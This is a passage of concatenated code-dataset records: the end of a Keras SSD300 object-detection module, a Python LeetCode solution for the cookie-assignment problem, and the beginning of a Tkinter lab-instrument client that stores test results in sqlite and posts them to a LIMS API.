np.array(variances)\n self.clip = True\n super(PriorBox, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n num_priors_ = len(self.aspect_ratios)\n layer_width = input_shape[self.waxis]\n layer_height = input_shape[self.haxis]\n num_boxes = num_priors_ * layer_width * layer_height\n return (input_shape[0], num_boxes, 8)\n\n def call(self, x, mask=None):\n if hasattr(x, '_keras_shape'):\n input_shape = x._keras_shape\n elif hasattr(K, 'int_shape'):\n input_shape = K.int_shape(x)\n layer_width = input_shape[self.waxis]\n layer_height = input_shape[self.haxis]\n img_width = self.img_size[0]\n img_height = self.img_size[1]\n # define prior boxes shapes\n box_widths = []\n box_heights = []\n for ar in self.aspect_ratios:\n if ar == 1 and len(box_widths) == 0:\n box_widths.append(self.min_size)\n box_heights.append(self.min_size)\n elif ar == 1 and len(box_widths) > 0:\n box_widths.append(np.sqrt(self.min_size * self.max_size))\n box_heights.append(np.sqrt(self.min_size * self.max_size))\n elif ar != 1:\n box_widths.append(self.min_size * np.sqrt(ar))\n box_heights.append(self.min_size / np.sqrt(ar))\n box_widths = 0.5 * np.array(box_widths)\n box_heights = 0.5 * np.array(box_heights)\n # define centers of prior boxes\n step_x = img_width / layer_width\n step_y = img_height / layer_height\n linx = np.linspace(0.5 * step_x, img_width - 0.5 * step_x,\n layer_width)\n liny = np.linspace(0.5 * step_y, img_height - 0.5 * step_y,\n layer_height)\n centers_x, centers_y = np.meshgrid(linx, liny)\n centers_x = centers_x.reshape(-1, 1)\n centers_y = centers_y.reshape(-1, 1)\n # define xmin, ymin, xmax, ymax of prior boxes\n num_priors_ = len(self.aspect_ratios)\n prior_boxes = np.concatenate((centers_x, centers_y), axis=1)\n prior_boxes = np.tile(prior_boxes, (1, 2 * num_priors_))\n prior_boxes[:, ::4] -= box_widths\n prior_boxes[:, 1::4] -= box_heights\n prior_boxes[:, 2::4] += box_widths\n prior_boxes[:, 3::4] += box_heights\n prior_boxes[:, ::2] /= img_width\n prior_boxes[:, 1::2] /= img_height\n prior_boxes = prior_boxes.reshape(-1, 4)\n if self.clip:\n prior_boxes = np.minimum(np.maximum(prior_boxes, 0.0), 1.0)\n # define variances\n num_boxes = len(prior_boxes)\n if len(self.variances) == 1:\n variances = np.ones((num_boxes, 4)) * self.variances[0]\n elif len(self.variances) == 4:\n variances = np.tile(self.variances, (num_boxes, 1))\n else:\n raise Exception('Must provide one or four variances.')\n prior_boxes = np.concatenate((prior_boxes, variances), axis=1)\n prior_boxes_tensor = K.expand_dims(K.variable(prior_boxes), 0)\n if K.backend() == 'tensorflow':\n pattern = [tf.shape(x)[0], 1, 1]\n prior_boxes_tensor = tf.tile(prior_boxes_tensor, pattern)\n elif K.backend() == 'theano':\n #TODO\n pass\n return prior_boxes_tensor\n\n\nclass SSDArchitecture(vectorial.core.Architecture):\n \"\"\"SSD300 architecture.\n\n # Arguments\n input_shape: Shape of the input image,\n expected to be either (300, 300, 3) or (3, 300, 300)(not tested).\n num_classes: Number of classes including background.\n\n # References\n https://arxiv.org/abs/1512.02325\n \"\"\"\n\n def __init__(self, num_classes=21, dropout_rate=None, input_shape=(300, 300, 3)):\n super().__init__()\n \n self.num_classes = num_classes \n net = {}\n\n # Block 1\n input_tensor = Input(shape=input_shape)\n img_size = (input_shape[1], input_shape[0])\n net['input'] = input_tensor\n net['conv1_1'] = Conv2D(64, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv1_1\")(net['input'])\n net['conv1_2'] = Conv2D(64, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv1_2\")(net['conv1_1'])\n net['pool1'] = MaxPooling2D((2, 2), padding=\"same\", strides=(2, 2), name=\"pool1\")(net['conv1_2'])\n \n # Block 2\n net['conv2_1'] = Conv2D(128, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv2_1\")(net['pool1'])\n net['conv2_2'] = Conv2D(128, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv2_2\")(net['conv2_1'])\n net['pool2'] = MaxPooling2D((2, 2), padding=\"same\", strides=(2, 2), name=\"pool2\")(net['conv2_2'])\n\n # Block 3\n net['conv3_1'] = Conv2D(256, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv3_1\")(net['pool2'])\n net['conv3_2'] = Conv2D(256, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv3_2\")(net['conv3_1'])\n net['conv3_3'] = Conv2D(256, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv3_3\")(net['conv3_2'])\n net['pool3'] = MaxPooling2D((2, 2), padding=\"same\", strides=(2, 2), name=\"pool3\")(net['conv3_3'])\n \n # Block 4\n net['conv4_1'] = Conv2D(512, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv4_1\")(net['pool3'])\n net['conv4_2'] = Conv2D(512, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv4_2\")(net['conv4_1'])\n net['conv4_3'] = Conv2D(512, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv4_3\")(net['conv4_2'])\n net['pool4'] = MaxPooling2D((2, 2), padding=\"same\", strides=(2, 2), name=\"pool4\")(net['conv4_3'])\n\n # Block 5\n net['conv5_1'] = Conv2D(512, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv5_1\")(net['pool4'])\n net['conv5_2'] = Conv2D(512, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv5_2\")(net['conv5_1'])\n net['conv5_3'] = Conv2D(512, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv5_3\")(net['conv5_2'])\n net['pool5'] = MaxPooling2D((3, 3), padding=\"same\", strides=(1, 1), name=\"pool5\")(net['conv5_3'])\n\n if dropout_rate is not None:\n # FC6\n net['fc6'] = Conv2D(1024, (3, 3), padding=\"same\", activation=\"relu\", dilation_rate=(6, 6), name=\"fc6\")(net['pool5'])\n net['drop6'] = Dropout(dropout_rate, name='drop6')(net['fc6'])\n \n # FC7\n net['fc7'] = Conv2D(1024, (1, 1), padding=\"same\", activation=\"relu\", name=\"fc7\")(net['drop6'])\n net['drop7'] = Dropout(dropout_rate, name='drop7')(net['fc7'])\n \n # Block 6\n net['conv6_1'] = Conv2D(256, (1, 1), padding=\"same\", activation=\"relu\", name=\"conv6_1\")(net['drop7'])\n net['conv6_2'] = Conv2D(512, (3, 3), padding=\"same\", strides=(2, 2), activation=\"relu\", name=\"conv6_2\")(net['conv6_1'])\n else:\n # FC6\n net['fc6'] = Conv2D(1024, (3, 3), padding=\"same\", activation=\"relu\", dilation_rate=(6, 6), name=\"fc6\")(net['pool5'])\n \n # FC7\n net['fc7'] = Conv2D(1024, (1, 1), padding=\"same\", activation=\"relu\", name=\"fc7\")(net['fc6'])\n \n # Block 6\n net['conv6_1'] = Conv2D(256, (1, 1), padding=\"same\", activation=\"relu\", name=\"conv6_1\")(net['fc7'])\n net['conv6_2'] = Conv2D(512, (3, 3), padding=\"same\", strides=(2, 2), activation=\"relu\", name=\"conv6_2\")(net['conv6_1'])\n\n # Block 7\n net['conv7_1'] = Conv2D(128, (1, 1), padding=\"same\", activation=\"relu\", name=\"conv7_1\")(net['conv6_2'])\n net['conv7_2'] = ZeroPadding2D()(net['conv7_1'])\n net['conv7_2'] = Conv2D(256, (3, 3), padding=\"valid\", strides=(2, 2), activation=\"relu\", name=\"conv7_2\")(net['conv7_2'])\n \n # Block 8\n net['conv8_1'] = Conv2D(128, (1, 1), padding=\"same\", activation=\"relu\", name=\"conv8_1\")(net['conv7_2'])\n net['conv8_2'] = Conv2D(256, (3, 3), padding=\"same\", strides=(2, 2), activation=\"relu\", name=\"conv8_2\")(net['conv8_1'])\n \n # Last Pool\n net['pool6'] = GlobalAveragePooling2D(name='pool6')(net['conv8_2'])\n \n # Prediction from conv4_3\n net['conv4_3_norm'] = Normalize(20, name='conv4_3_norm')(net['conv4_3'])\n num_priors = 3\n \n x = Conv2D(num_priors * 4, (3, 3), padding=\"same\", name=\"conv4_3_norm_mbox_loc\")(net['conv4_3_norm'])\n net['conv4_3_norm_mbox_loc'] = x\n flatten = Flatten(name='conv4_3_norm_mbox_loc_flat')\n net['conv4_3_norm_mbox_loc_flat'] = flatten(net['conv4_3_norm_mbox_loc'])\n name = 'conv4_3_norm_mbox_conf'\n if num_classes != 21:\n name += '_{}'.format(num_classes)\n x = Conv2D(num_priors * num_classes, (3, 3), padding=\"same\", name=name)(net['conv4_3_norm'])\n net['conv4_3_norm_mbox_conf'] = x\n flatten = Flatten(name='conv4_3_norm_mbox_conf_flat')\n net['conv4_3_norm_mbox_conf_flat'] = flatten(net['conv4_3_norm_mbox_conf'])\n priorbox = PriorBox(img_size, 30.0, aspect_ratios=[2],\n variances=[0.1, 0.1, 0.2, 0.2],\n name='conv4_3_norm_mbox_priorbox')\n net['conv4_3_norm_mbox_priorbox'] = priorbox(net['conv4_3_norm'])\n # Prediction from fc7\n num_priors = 6\n net['fc7_mbox_loc'] = Conv2D(num_priors * 4, (3, 3), padding=\"same\", name=\"fc7_mbox_loc\")(net['fc7'])\n flatten = Flatten(name='fc7_mbox_loc_flat')\n net['fc7_mbox_loc_flat'] = flatten(net['fc7_mbox_loc'])\n name = 'fc7_mbox_conf'\n if num_classes != 21:\n name += '_{}'.format(num_classes)\n net['fc7_mbox_conf'] = Conv2D(num_priors * num_classes, (3, 3), padding=\"same\", name=name)(net['fc7'])\n flatten = Flatten(name='fc7_mbox_conf_flat')\n net['fc7_mbox_conf_flat'] = flatten(net['fc7_mbox_conf'])\n priorbox = PriorBox(img_size, 60.0, max_size=114.0, aspect_ratios=[2, 3],\n variances=[0.1, 0.1, 0.2, 0.2],\n name='fc7_mbox_priorbox')\n net['fc7_mbox_priorbox'] = priorbox(net['fc7'])\n # Prediction from conv6_2\n num_priors = 6\n x = Conv2D(num_priors * 4, (3, 3), padding=\"same\", name=\"conv6_2_mbox_loc\")(net['conv6_2'])\n net['conv6_2_mbox_loc'] = x\n flatten = Flatten(name='conv6_2_mbox_loc_flat')\n net['conv6_2_mbox_loc_flat'] = flatten(net['conv6_2_mbox_loc'])\n name = 'conv6_2_mbox_conf'\n if num_classes != 21:\n name += '_{}'.format(num_classes)\n x = Conv2D(num_priors * num_classes, (3, 3), padding=\"same\", name=name)(net['conv6_2'])\n net['conv6_2_mbox_conf'] = x\n flatten = Flatten(name='conv6_2_mbox_conf_flat')\n net['conv6_2_mbox_conf_flat'] = flatten(net['conv6_2_mbox_conf'])\n priorbox = PriorBox(img_size, 114.0, max_size=168.0, aspect_ratios=[2, 3],\n variances=[0.1, 0.1, 0.2, 0.2],\n name='conv6_2_mbox_priorbox')\n net['conv6_2_mbox_priorbox'] = priorbox(net['conv6_2'])\n # Prediction from conv7_2\n num_priors = 6\n x = Conv2D(num_priors * 4, (3, 3), padding=\"same\", name=\"conv7_2_mbox_loc\")(net['conv7_2'])\n net['conv7_2_mbox_loc'] = x\n flatten = Flatten(name='conv7_2_mbox_loc_flat')\n net['conv7_2_mbox_loc_flat'] = flatten(net['conv7_2_mbox_loc'])\n name = 'conv7_2_mbox_conf'\n if num_classes != 21:\n name += '_{}'.format(num_classes)\n x = Conv2D(num_priors * num_classes, (3, 3), padding=\"same\", name=name)(net['conv7_2'])\n net['conv7_2_mbox_conf'] = x\n flatten = Flatten(name='conv7_2_mbox_conf_flat')\n net['conv7_2_mbox_conf_flat'] = flatten(net['conv7_2_mbox_conf'])\n priorbox = PriorBox(img_size, 168.0, max_size=222.0, aspect_ratios=[2, 3],\n variances=[0.1, 0.1, 0.2, 0.2],\n name='conv7_2_mbox_priorbox')\n net['conv7_2_mbox_priorbox'] = priorbox(net['conv7_2'])\n # Prediction from conv8_2\n num_priors = 6\n x = Conv2D(num_priors * 4, (3, 3), padding=\"same\", name=\"conv8_2_mbox_loc\")(net['conv8_2'])\n net['conv8_2_mbox_loc'] = x\n flatten = Flatten(name='conv8_2_mbox_loc_flat')\n net['conv8_2_mbox_loc_flat'] = flatten(net['conv8_2_mbox_loc'])\n name = 'conv8_2_mbox_conf'\n if num_classes != 21:\n name += '_{}'.format(num_classes)\n x = Conv2D(num_priors * num_classes, (3, 3), padding=\"same\", name=name)(net['conv8_2'])\n net['conv8_2_mbox_conf'] = x\n flatten = Flatten(name='conv8_2_mbox_conf_flat')\n net['conv8_2_mbox_conf_flat'] = flatten(net['conv8_2_mbox_conf'])\n priorbox = PriorBox(img_size, 222.0, max_size=276.0, aspect_ratios=[2, 3],\n variances=[0.1, 0.1, 0.2, 0.2],\n name='conv8_2_mbox_priorbox')\n net['conv8_2_mbox_priorbox'] = priorbox(net['conv8_2'])\n # Prediction from pool6\n num_priors = 6\n x = Dense(num_priors * 4, name='pool6_mbox_loc_flat')(net['pool6'])\n net['pool6_mbox_loc_flat'] = x\n name = 'pool6_mbox_conf_flat'\n if num_classes != 21:\n name += '_{}'.format(num_classes)\n x = Dense(num_priors * num_classes, name=name)(net['pool6'])\n net['pool6_mbox_conf_flat'] = x\n priorbox = PriorBox(img_size, 276.0, max_size=330.0, aspect_ratios=[2, 3],\n variances=[0.1, 0.1, 0.2, 0.2],\n name='pool6_mbox_priorbox')\n \n target_shape = (1, 1, 256)\n net['pool6_reshaped'] = Reshape(target_shape,\n name='pool6_reshaped')(net['pool6'])\n net['pool6_mbox_priorbox'] = priorbox(net['pool6_reshaped'])\n # Gather all predictions\n net['mbox_loc'] = concatenate([net['conv4_3_norm_mbox_loc_flat'],\n net['fc7_mbox_loc_flat'],\n net['conv6_2_mbox_loc_flat'],\n net['conv7_2_mbox_loc_flat'],\n net['conv8_2_mbox_loc_flat'],\n net['pool6_mbox_loc_flat']],\n axis=1, name='mbox_loc')\n net['mbox_conf'] = concatenate([net['conv4_3_norm_mbox_conf_flat'],\n net['fc7_mbox_conf_flat'],\n net['conv6_2_mbox_conf_flat'],\n net['conv7_2_mbox_conf_flat'],\n net['conv8_2_mbox_conf_flat'],\n net['pool6_mbox_conf_flat']],\n axis=1, name='mbox_conf')\n net['mbox_priorbox'] = concatenate([net['conv4_3_norm_mbox_priorbox'],\n net['fc7_mbox_priorbox'],\n net['conv6_2_mbox_priorbox'],\n net['conv7_2_mbox_priorbox'],\n net['conv8_2_mbox_priorbox'],\n net['pool6_mbox_priorbox']],\n axis=1, name='mbox_priorbox')\n if hasattr(net['mbox_loc'], '_keras_shape'):\n num_boxes = net['mbox_loc']._keras_shape[-1] // 4\n elif hasattr(net['mbox_loc'], 'int_shape'):\n num_boxes = K.int_shape(net['mbox_loc'])[-1] // 4\n net['mbox_loc'] = Reshape((num_boxes, 4),\n name='mbox_loc_final')(net['mbox_loc'])\n net['mbox_conf'] = Reshape((num_boxes, num_classes),\n name='mbox_conf_logits')(net['mbox_conf'])\n net['mbox_conf'] = Activation('softmax',\n name='mbox_conf_final')(net['mbox_conf'])\n net['predictions'] = concatenate([net['mbox_loc'],\n net['mbox_conf'],\n net['mbox_priorbox']],\n axis=2, name='predictions')\n\n self._model = KerasModel(net['input'], net['predictions'])\n\n loss = MultiboxLoss(self.num_classes, neg_pos_ratio=2.0).compute_loss\n metrics = []\n optimizer = SGD(lr=1e-2)\n self._defaults = {'loss': loss, 'metrics': metrics, 'optimizer': optimizer}\n self._custom_objects = {'Normalize': Normalize, 'PriorBox': PriorBox}\n\n\nclass SSDSequence(Sequence):\n def __init__(self, gt,\n batch_size, path_prefix,\n images, image_size,\n saturation_var=0.5,\n brightness_var=0.5,\n contrast_var=0.5,\n lighting_std=0.5,\n hflip_prob=0.5,\n vflip_prob=0.5,\n do_crop=True,\n crop_area_range=[0.75, 1.0],\n aspect_ratio_range=[3./4., 4./3.],\n train=False,\n dir_debug=None,\n num_classes=21):\n \n dir_path = os.path.dirname(os.path.realpath(__file__))\n priors = pickle.load(open(os.path.join(dir_path, 'prior_boxes_ssd300.pkl'), 'rb')) #TODO: fix\n self.bbox_util = BBoxUtility(num_classes, priors)\n self.gt = gt\n self.batch_size = batch_size\n self.path_prefix = path_prefix\n self.images = images\n self.image_size = image_size\n self.train = train\n self.color_jitter = []\n self.dir_debug = dir_debug\n if saturation_var:\n self.saturation_var = saturation_var\n self.color_jitter.append(self.saturation)\n if brightness_var:\n self.brightness_var = brightness_var\n self.color_jitter.append(self.brightness)\n if contrast_var:\n self.contrast_var = contrast_var\n self.color_jitter.append(self.contrast)\n self.lighting_std = lighting_std\n self.hflip_prob = hflip_prob\n self.vflip_prob = vflip_prob\n self.do_crop = do_crop\n self.crop_area_range = crop_area_range\n self.aspect_ratio_range = aspect_ratio_range\n \n def grayscale(self, rgb):\n return rgb.dot([0.299, 0.587, 0.114])\n\n def saturation(self, rgb):\n gs = self.grayscale(rgb)\n alpha = 2 * np.random.random() * self.saturation_var \n alpha += 1 - self.saturation_var\n rgb = rgb * alpha + (1 - alpha) * gs[:, :, None]\n return np.clip(rgb, 0, 255)\n\n def brightness(self, rgb):\n alpha = 2 * np.random.random() * self.brightness_var \n alpha += 1 - self.saturation_var\n rgb = rgb * alpha\n return np.clip(rgb, 0, 255)\n\n def contrast(self, rgb):\n gs = self.grayscale(rgb).mean() * np.ones_like(rgb)\n alpha = 2 * np.random.random() * self.contrast_var \n alpha += 1 - self.contrast_var\n rgb = rgb * alpha + (1 - alpha) * gs\n return np.clip(rgb, 0, 255)\n\n def lighting(self, img):\n cov = np.cov(img.reshape(-1, 3) / 255.0, rowvar=False)\n eigval, eigvec = np.linalg.eigh(cov)\n noise = np.random.randn(3) * self.lighting_std\n noise = eigvec.dot(eigval * noise) * 255\n img += noise\n return np.clip(img, 0, 255)\n \n def horizontal_flip(self, img, y):\n if np.random.random() < self.hflip_prob:\n img = img[:, ::-1]\n y[:, [0, 2]] = 1 - y[:, [2, 0]]\n return img, y\n \n def vertical_flip(self, img, y):\n if np.random.random() < self.vflip_prob:\n img = img[::-1]\n y[:, [1, 3]] = 1 - y[:, [3, 1]]\n return img, y\n \n def random_sized_crop(self, img, targets_y):\n img_w = img.shape[1]\n img_h = img.shape[0]\n img_area = img_w * img_h\n random_scale = np.random.random()\n random_scale *= (self.crop_area_range[1] -\n self.crop_area_range[0])\n random_scale += self.crop_area_range[0]\n target_area = random_scale * img_area\n random_ratio = np.random.random()\n random_ratio *= (self.aspect_ratio_range[1] -\n self.aspect_ratio_range[0])\n random_ratio += self.aspect_ratio_range[0]\n w = np.round(np.sqrt(target_area * random_ratio)) \n h = np.round(np.sqrt(target_area / random_ratio))\n if np.random.random() < 0.5:\n w, h = h, w\n w = min(w, img_w)\n w_rel = w / img_w\n w = int(w)\n h = min(h, img_h)\n h_rel = h / img_h\n h = int(h)\n x = np.random.random() * (img_w - w)\n x_rel = x / img_w\n x = int(x)\n y = np.random.random() * (img_h - h)\n y_rel = y / img_h\n y = int(y)\n img = img[y:y+h, x:x+w]\n new_targets = []\n for box in targets_y:\n cx = 0.5 * (box[0] + box[2])\n cy = 0.5 * (box[1] + box[3])\n if (x_rel < cx < x_rel + w_rel and\n y_rel < cy < y_rel + h_rel):\n xmin = (box[0] - x_rel) / w_rel\n ymin = (box[1] - y_rel) / h_rel\n xmax = (box[2] - x_rel) / w_rel\n ymax = (box[3] - y_rel) / h_rel\n xmin = max(0, xmin)\n ymin = max(0, ymin)\n xmax = min(1, xmax)\n ymax = min(1, ymax)\n box[:4] = [xmin, ymin, xmax, ymax]\n new_targets.append(box)\n new_targets = np.asarray(new_targets).reshape(-1, targets_y.shape[1])\n return img, new_targets\n \n def __getitem__(self, idx):\n ix = np.random.choice(np.arange(len(self.images)), self.batch_size) # TODO: shuffle per batch?\n inputs = []\n targets = []\n for i in ix:\n filename = self.images[i]\n img_path = os.path.join(self.path_prefix, filename)\n img = cv2.imread(img_path) # TODO: fix RGB or BGR?\n y = np.array(self.gt[filename].copy())\n if self.train and self.do_crop:\n img, y = self.random_sized_crop(img, y)\n img = cv2.resize(img, self.image_size)\n if self.train:\n shuffle(self.color_jitter)\n for jitter in self.color_jitter:\n img = jitter(img)\n if self.lighting_std:\n img = self.lighting(img)\n if self.hflip_prob > 0:\n img, y = self.horizontal_flip(img, y)\n if self.vflip_prob > 0:\n img, y = self.vertical_flip(img, y)\n if self.dir_debug is not None:\n y2 = y.copy()\n img2 = img.copy()\n for yy2 in y2:\n cv2.rectangle(img2, (int(yy2[0] * img2.shape[1]), int(yy2[1] * img2.shape[0])), (int(yy2[2] * img2.shape[1]), int(yy2[3] * img2.shape[0])), (255,0,0), 3)\n cv2.imwrite(self.dir_debug + filename, img2)\n y = self.bbox_util.assign_boxes(y)\n img = np.array(img, dtype=np.float32)\n img = preprocess_input(img)\n inputs.append(img) \n targets.append(y)\n return np.array(inputs), np.array(targets)\n \n def __len__(self):\n x = int(np.ceil(len(self.images) / float(self.batch_size)))\n return x\n\ndef _ssd_voc_iterator(data_dir, file_path, label_dir, image_size=(300,300), train=False, dir_debug=None):\n def f_iter(arch, bs):\n with open(file_path) as f:\n files = f.readlines()\n\n images_files = [f.strip('\\n\\r') + '.jpg' for f in files]\n annotations_files = [f.strip('\\n\\r') + '.xml' for f in files]\n\n gt = dict()\n classes = ['person', 'bird', 'cat', 'cow', 'dog', 'horse', 'sheep', 'aeroplane',\n 'bicycle', 'boat', 'bus', 'car', 'motorbike', 'train', 'bottle', 'chair',\n 'diningtable', 'pottedplant', 'sofa', 'tvmonitor']\n for a in annotations_files:\n xml_path = os.path.join(label_dir, a)\n tree = ElementTree.parse(xml_path)\n root_node = tree.getroot()\n img_filename = root_node.find('filename').text\n size_tree = root_node.find('size')\n width = float(size_tree.find('width').text)\n height = float(size_tree.find('height').text)\n object_tree_list = root_node.findall('object')\n objs = []\n for object_annotation in object_tree_list:\n obj = []\n class_name = object_annotation.find('name').text\n obj_bbox = object_annotation.find('bndbox')\n obj.append(round(float(obj_bbox.find('xmin').text)/width, 5))\n obj.append(round(float(obj_bbox.find('ymin').text)/height, 5))\n obj.append(round(float(obj_bbox.find('xmax').text)/width, 5))\n obj.append(round(float(obj_bbox.find('ymax').text)/height, 5))\n for c in classes:\n if c==class_name:\n obj.append(1.)\n else:\n obj.append(0.)\n objs.append(obj)\n gt[img_filename] = objs\n\n i = SSDSequence(gt,\n bs, data_dir,\n images_files, image_size=image_size,\n saturation_var=0.5,\n brightness_var=0.5,\n contrast_var=0.5,\n lighting_std=0.5,\n hflip_prob=0.5,\n vflip_prob=0.5,\n do_crop=True,\n crop_area_range=[0.75, 1.0],\n aspect_ratio_range=[3./4., 4./3.], \n train=train,\n dir_debug=dir_debug,\n num_classes=arch.num_classes)\n return i\n \n return f_iter\n\ndef _ssd_iterator(data_dir, annotations, classes, image_size=(300,300), train=False, dir_debug=None):\n def f_iter(arch, bs):\n gt = dict()\n images_files = []\n for a in annotations:\n img_file, instance, cl, xmin, xmax, ymin, ymax = a.split(',')\n images_files.append(img_file)\n img = cv2.imread(os.path.join(data_dir, img_file))\n h, w, _ = img.shape\n obj = []\n obj.append(round(float(xmin)/w, 5))\n obj.append(round(float(ymin)/h, 5))\n obj.append(round(float(xmax)/w, 5))\n obj.append(round(float(ymax)/h, 5))\n for c in classes:\n if c==cl:\n obj.append(1.)\n else:\n obj.append(0.)\n if img_file in gt:\n gt[img_file].append(obj)\n else:\n gt[img_file] = [obj]\n\n i = SSDSequence(gt,\n bs, data_dir,\n images_files, image_size=image_size,\n saturation_var=0.5,\n brightness_var=0.5,\n contrast_var=0.5,\n lighting_std=0.5,\n hflip_prob=0.5,\n vflip_prob=0,\n do_crop=True,\n crop_area_range=[0.75, 1.0],\n aspect_ratio_range=[3./4., 4./3.], \n train=train,\n dir_debug=dir_debug,\n num_classes=arch.num_classes)\n return i\n \n return f_iter\n\nclass SSDData(vectorial.core.Data):\n def __init__(self, tg, vg, eg):\n super().__init__(tg, vg, eg)\n\n @classmethod\n def from_voc(cls, data_dir, train_file_path, val_file_path, label_dir, seed=None):\n tg = _ssd_voc_iterator(data_dir, train_file_path, label_dir, train=True, dir_debug=None)\n vg = _ssd_voc_iterator(data_dir, val_file_path, label_dir, train=False, dir_debug=None)\n eg = None\n return cls(tg, vg, eg)\n \n @classmethod\n def from_directory(cls, data_dir, annotations_file, classes, seed=None, dir_debug=None):\n with open(annotations_file) as f:\n annotations = f.readlines()\n\n annotations = [f.strip('\\n\\r') for f in annotations if not f.split(',')[0].lower().endswith('gif')]\n annotations = annotations[1:] # exclude header\n shuffle(annotations)\n cnt_train = int(len(annotations)*.8)\n train_annotations = annotations[:cnt_train]\n val_annotations = annotations[cnt_train:]\n\n tg = _ssd_iterator(data_dir, annotations, classes, train=True, dir_debug=dir_debug)\n vg = _ssd_iterator(data_dir, annotations, classes, train=False, dir_debug=dir_debug)\n eg = None\n return cls(tg, vg, eg)\n\nclass SSDModel(vectorial.core.Model):\n def __init__(self, name, architecture, data):\n super().__init__(name, architecture, data)\n dir_path = os.path.dirname(os.path.realpath(__file__))\n architecture._model.load_weights(os.path.join(dir_path, 'weights_SSD300.hdf5'), by_name=True)\n\n freeze = ['input_1', 'conv1_1', 'conv1_2', 'pool1',\n 'conv2_1', 'conv2_2', 'pool2', 'conv3_1',\n 'conv3_2', 'conv3_3', 'pool3']\n \n for L in architecture._model.layers:\n if L.name in freeze:\n L.trainable = False\n\n def predict_path(self, weights, img_path, classes, threshold=0.8):\n img = cv2.imread(img_path)\n return self.predict(weights, [img], classes, threshold)\n \n def predict(self, weights, images, classes, threshold=0.8):\n self._architecture._model.load_weights(weights)\n inputs = []\n for img in images:\n img = np.array(img, dtype=np.float32)\n img = cv2.resize(img, (300,300))\n inputs.append(img.copy())\n inputs = preprocess_input(np.array(inputs))\n preds = self._architecture._model.predict(inputs, batch_size=64)\n bbox_util = BBoxUtility(len(classes)+1)\n results = bbox_util.detection_out(preds)\n results_dicts = []\n for r_image in results:\n dicts = []\n for r in r_image:\n label, conf, xmin, ymin, xmax, ymax = r\n if conf>threshold:\n dicts.append({'label': label, 'conf': conf, 'xmin': xmin, 'ymin': ymin, 'xmax': xmax, 'ymax': ymax})\n results_dicts.append(dicts)\n return results_dicts\n","sub_path":"vectorial/images/objectdetection/ssd/ssd.py","file_name":"ssd.py","file_ext":"py","file_size_in_byte":50450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"359845635","text":"'''\n假设你是一位很棒的家长,想要给你的孩子们一些小饼干。但是,每个孩子最多只能给一块饼干。\n对每个孩子 i,都有一个胃口值 g[i],这是能让孩子们满足胃口的饼干的最小尺寸;并且每块饼干 j,都有一个尺寸 s[j] 。如果 s[j] >= g[i],我们可以将这个饼干 j 分配给孩子 i ,这个孩子会得到满足。你的目标是尽可能满足越多数量的孩子,并输出这个最大数值。\n\n示例 1:\n输入: g = [1,2,3], s = [1,1]\n输出: 1\n解释:\n你有三个孩子和两块小饼干,3个孩子的胃口值分别是:1,2,3。\n虽然你有两块小饼干,由于他们的尺寸都是1,你只能让胃口值是1的孩子满足。\n所以你应该输出1。\n\n链接:https://leetcode-cn.com/problems/assign-cookies\n'''\nfrom typing import List\ndef findContentChildren(g: List[int], s: List[int]) -> int:\n '''\n 排序加双指针\n :param g:\n :param s:\n :return:\n '''\n g.sort()\n s.sort()\n glen,slen = len(g),len(s)\n i , j = 0,0\n while i < glen and j < slen:\n if s[j] >= g[i]:\n i+=1\n j+=1\n else:\n j+=1\n return i\n\n","sub_path":"code/34_分发饼干.py","file_name":"34_分发饼干.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"58770917","text":"import tkinter as tk\nimport tkinter.ttk as ttk\nimport os\nimport sys\nimport socket\nimport serial\nimport sqlite3\nimport platform\npy3 = True\n\nclass Toplevel1():\n\n instrumentName = \"Network_based_instrument\"\n port = 5100\n ip = 0\n \n # update counter where counter is used as the test id\n def cset(self):\n self.dbc('update counter set count = ' + str(self.cget() + 1) +\n ' where id = 1 ')\n return True\n\n # gets counter\n def cget(self):\n x = self.dbc('select count from counter where id = 1 ')[0][0]\n return x\n\n # inserts test that currespond to a given barcode to the database\n def testset(self, result):\n self.dbc('insert into test(test_id,barcodeid,results) values('\n '' + str(self.cget()) + ',\"' + result['id'] + '\",\"' + str(result['result']) + '\");')\n self.cset()\n return True\n\n # contact the LIMS api through a given url and gets the sample data\n # using barcode\n def getSampleParameters(self, sampleBarCode):\n sampleBarCode = str(sampleBarCode)\n print(self.sampleid + b'=' + sampleBarCode.encode())\n try:\n resp = requests.get(self.apigetter, params=self.sampleid + b'=' +\n sampleBarCode.encode(), timeout=2)\n if resp.status_code == 200:\n respjson = resp.json()\n print(respjson)\n if 'error' in respjson:\n return False\n required_tests = []\n for i in respjson[0]['parameters']:\n required_tests.append(i['code'])\n print(required_tests)\n return required_tests\n else:\n print('getSampleParameters: invalid resp')\n return 'nc'\n except:\n print('getsampleParameters: error in requests')\n return 'nc'\n\n # upload the state of given test to uploaded\n def testseterror(self, test):\n # print('setting uploaded')\n if self.dbc('update test set uploadstate = \"e\" where test_id = ' + str(test)):\n return True\n else:\n return False\n \n # upload the state of given test to uploaded\n def testsetuploaded(self, test):\n # print('setting uploaded')\n if self.dbc('update test set uploadstate = \"y\" where test_id = ' + str(test)):\n return True\n else:\n return False\n\n # uploads tests for the same api through different url\n def upload(self, sample):\n print('uploader')\n record = {'id': sample[1], 'instrument_code': self.instrumentName}\n print(record)\n parameters = []\n for test in sample[2]:\n parameters.append(\n {\n 'parameter': list(test.keys())[0],\n 'results': list(test.values())[0],\n 'status': 'null',\n 'flag': 'null'\n }\n )\n record['parameters'] = parameters\n print(record)\n try:\n resp = requests.post(self.apisetter, json=record)\n if resp.status_code == 200:\n self.testsetuploaded(sample[0])\n print(resp.json())\n return 'done'\n else:\n print(resp.status_code)\n print(resp.content.decode())\n return 'connection error'\n except:\n return 'upload: 